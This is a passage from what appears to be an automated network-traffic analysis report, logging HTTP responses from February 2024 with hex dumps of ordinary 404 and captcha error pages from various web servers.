74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:06 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:06 GMTServer: ApacheLast-Modified: Wed, 21 Mar 2018 06:16:02 GMTETag: "696-567e62015ec80"Accept-Ranges: bytesContent-Length: 1686Content-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 34 34 34 34 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 45 45 45 45 45 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 68 31 20 7b 7d 0a 20 20 20 20 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 65 6d 3b 20 7d 0a 20 20 20 20 23 70 61 67 65 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 34 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 33 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 37 35 30 37 36 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 34 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 43 35 35 30 34 32 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 35 78 78 20 7b 20 62 61 63 6b
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Tue, 20 Feb 2024 23:26:07 GMTContent-Length: 13719Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:07 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:07 GMTServer: ApacheLast-Modified: Wed, 21 Mar 2018 06:16:02 GMTETag: "696-567e62015ec80"Accept-Ranges: bytesContent-Length: 1686Content-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 34 34 34 34 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 45 45 45 45 45 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 68 31 20 7b 7d 0a 20 20 20 20 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 65 6d 3b 20 7d 0a 20 20 20 20 23 70 61 67 65 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 34 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 33 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 37 35 30 37 36 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 34 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 43 35 35 30 34 32 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 35 78 78 20 7b 20 62 61 63 6b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:08 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:08 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1708471568.436147754347411886Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLsrnLBntwLRXccxrbxQ/m1sa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalj5YEHgc/KekjV/90adoq/gbwdUZpOVjjbg2wDnAvIG6TrmaizDI51JRW5nqGyGO0Q==,2UNV7KOq4oGjA5+PKsX47PIHZG7rU4AwWR8fGXl1XwJYgeUJqUXtid+86vZww+nL,ttZawIJkYKmjc/NH+jiCcnCQrDd5pCY7L37bT7qLO6U=,MP7Bu5+BLGEj45VbG6JkxLgsZcue5LfS7Y8AwDwJeQU=,/j+AjfLiOiE0Vc9NsP8sK9M+eO7SwbESnybcBl/SxK7p7Ig815JIv3PlDeV2T8WsMNdRKgFF4Pt5Hop6v392bA==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 34 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 51 e2 c4 6e 26 05 e8 b2 14 cb cb 30 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff 7d 77 92 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 21 e7 8c 71 7e 79 70 90 1d 96 b6 08 ab 06 58 15 6a 7d 89 67 ce 0f 18 7e e8 36 23 1a 33 73 2e 9b 26 8f 16 6a 79 ed 9c 75 bf cb 39 f8 f7 4d 13 d1 03 90 e5 25 be cf 6a 08 92 19 59 43 1e dd 2b 58 34 d6 85 88 15 d6 04 30 81 58 cb 50 e5 25 dc ab 02 78 77 38 52 46 05 25 35 f7 85 d4 90 a7 47 ac 96 4b 55 b7 f5 7f 84 d6 83 eb 4e 72 8a 2f 8c 45 7d 6b 45 45 25 9d 07 14 dc 86 19 9f 6c 5d 54 21 34 1c be b6 ea 3e 8f fe e2 1f df f3 2b 5b 37 32 28 94 b0 65 ce cd 75 0e e5 1c 7a be a0 82 06 02 39 55 a6 cc a3 b8 41 78 5f 3a 62 cc fe 61 c1 49 e3 b5 0c f8 38 13 1d f5 31 dc 12 7c e1 54 13 94 35 5b 2a b6 6c da c3 2b 3b 5c ce 4e 6d f0 5b 72 8d 45 2b 61 79 c4 8c 9d 59 ad ed a2 67 d9 04 94 42 97 69 65 ee 18 05 35 8f 54 8d 70 44 63 e6 11 ab 1c cc f2 48 88 c5 62 91 60 2c 93 c2 d6 62 26 31 24 d6 24 f8 15 31 07 3a 8f 7c 85 a1 2b da c0 88 be 23 bc 17 bd 96 e4 03 ba b6 48 1a e9 a4 0f d6 a1 a6 4e 28 c6 8d 02 ed 45 a8 94 2b 39 5e 87 95 98 61 2e 78 f1 2b e8 7b 40 1e d9 9d 3f c8 02 39 3c e2 eb 55 87 95 06 5f 01 60 ea f4 d6 07 58 06 d1 3d 10 9d db b7 60 f6 96 ec f0 3d d7 34 74 00 6f da a9 56 85 48 93 71 fa 2e 39 16 be 53 2f 80 72 1c 8d c6 24 1f 48 9d 89 0f f5 67 a2 cf fc 6c 6a cb 15 d3 d2 cc f3 08 30 fe 98 Data Ascii: 443Vo6_E-Qn&0l((Z:[L(R%F}w9ql7c!q~ypXj}g~6#3s.&jyu9M%jYC+X40XP%xw8RF%5GKUNr/E}kEE%l]T!4>+[72(euz9UAx_:baI81\|T5[*l+;\Nm[rE+ayYgBie5TpDcHb`,b&1$$1:\|+#HN(E+9^a.x+{@?9<U_`X=`=4toVHq.9S/r$Hglj0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:08 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1708471568.5841474889735131813Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLlAwLb1tXR23DYhcoMEdpYDu/2EjeiyKjB/JVOb8T5Ve,2d58ifebGbosy5xc+FRalqL0nQnEA3y75sfTMFFEpDD5YDxchWjcpg+/I0IXVGKaCBKpq3nPY1N6rHRwSWtdlw==,2UNV7KOq4oGjA5+PKsX47Ad3BAkeAb9lWxcyN70+/DFYgeUJqUXtid+86vZww+nL,oeCSbq11YyM2LrWdre0MiAPBzEMPrQyi9uZsFRcWByA=,GCZRqREx605Y6yDgjOvSr0gzVvd88M9o49AqjE+T7lA=,/j+AjfLiOiE0Vc9NsP8sK9OGBA8EjSrrb+o8MGqPfV+fyFdu1BpPpgIayAnxFT6M+El08WdAlazUFNCK4dJeYQ==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 34 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 51 e2 2c 4e 26 05 e8 b2 0e cb cb 30 6c 28 b0 a1 28 0a 5a 3a db 4c 28 52 25 a9 d8 46 d7 ff 7d 77 94 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 c5 21 e7 8c 71 7e 75 70 50 1c d6 b6 0a ab 16 d8 3c 34 fa 0a cf 9c 1f 30 fc d0 6d 41 34 66 66 5c b6 6d 99 2c d4 f2 bd 73 d6 fd 2e 67 e0 df b5 6d 42 0f 40 d6 57 f8 be 68 20 48 66 64 03 65 72 af 60 d1 5a 17 12 56 59 13 c0 04 62 ad c3 bc ac e1 5e 55 c0 e3 e1 48 19 15 94 d4 dc 57 52 43 99 1f b1 46 2e 55 d3 35 ff 11 3a 0f 2e 9e e4 04 5f 18 8b fa d6 8a aa b9 74 1e 50 70 17 a6 7c bc 75 31 0f a1 e5 f0 a5 53 f7 65 f2 17 ff f0 8e 5f db a6 95 41 a1 84 2d 73 6e de 97 50 cf a0 e7 0b 2a 68 20 90 13 65 ea 32 49 5b 84 f7 39 12 53 f6 0f 0b 4e 1a af 65 c0 c7 85 88 d4 c7 70 6b f0 95 53 6d 50 d6 6c a9 d8 b2 69 0f af ec 70 39 3b b1 c1 6f c9 35 16 ad 84 e5 11 33 76 6a b5 b6 8b 9e 65 13 50 0a 5d a1 95 b9 63 14 d4 32 51 0d c2 11 ad 99 25 6c ee 60 5a 26 42 2c 16 8b 0c 63 99 55 b6 11 53 89 21 b1 26 c3 af 84 39 d0 65 e2 e7 18 ba aa 0b 8c e8 3b c2 7b d1 6b 49 3e a0 6b ab ac 95 4e fa 60 1d 6a 8a 42 31 6e 14 68 2f c2 5c b9 9a e3 75 58 89 29 e6 82 17 bf 82 be 07 e4 91 f1 fc 8b ac 90 c3 23 be 5e 75 58 69 f0 73 00 4c 9d de fa 00 cb 20 e2 03 11 dd be 05 b3 b7 64 87 ef b9 a6 a1 03 78 db 4d b4 aa 44 9e 9d e7 17 d9 b1 f0 51 bd 00 ca 71 34 1a 93 7c 20 45 13 1f ea 2f 44 9f f9 c5 c4 d6 2b a6 a5 99 95 09 60 fc Data Ascii: 444Vo6_E-Q,N&0l((Z:L(R%F}w9ql7c!q~upP<40mA4ff\m,s.gmB@Wh Hfder`ZVYb^UHWRCF.U5:._tPp\|u1Se_A-snP*h e2I[9SNepkSmPlip9;o53vjeP]c2Q%l`Z&B,cUS!&9e;{kI>kN`jB1nh/\uX)#^uXisL dxMDQq4\| E/D+`
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Tue, 20 Feb 2024 23:26:08 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: DlNNcL8N/kZQwWwBZData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 